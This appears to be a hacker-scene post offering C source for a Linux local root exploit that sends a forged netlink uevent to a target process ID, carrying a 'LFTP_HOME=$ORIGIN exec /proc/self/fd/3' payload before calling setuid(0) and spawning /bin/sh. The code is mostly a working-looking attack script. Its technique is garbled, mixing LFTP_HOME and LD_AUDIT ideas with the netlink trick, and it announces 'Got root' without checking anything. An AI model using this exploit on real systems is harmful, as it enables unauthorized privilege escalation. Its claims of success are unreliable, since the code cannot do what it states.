Netlink AUDIT localroot exploit
NETLINK / LFTP_HOME/LD_AUDIT BUG made from PoC and code for the netlink bug!
AWESOME PF_NETLINK 0verflow mixed with a local LFTP_HOME or LD_AUDIT could be replaced… for the payload etc..
Anyhow, have fun!

xd– / #Haxnet / #Haxshells free shells service (IPv6 all vhosts are m1n3 b4b1 !

/* netlink-lftp_home bug */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];
        char message[LONG_STRING];
        char *mp;
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;
        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;
        printf("-> PiD: %s\n",argv[1]);
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LFTP_HOME=$ORIGIN exec /proc/self/fd/3") +1;
        printf("-> Writing payload ..\n");
        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);
        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);
        printf("-> Sending payload ..");
        sendmsg(socket_fd, &msg, 0);
        close(socket_fd);
        sleep(2);
        printf("-> Got root, setting up shell ..");
        setuid(0);
        setgid(0);
        execl("/bin/sh", "/bin/sh", (void*)0);
}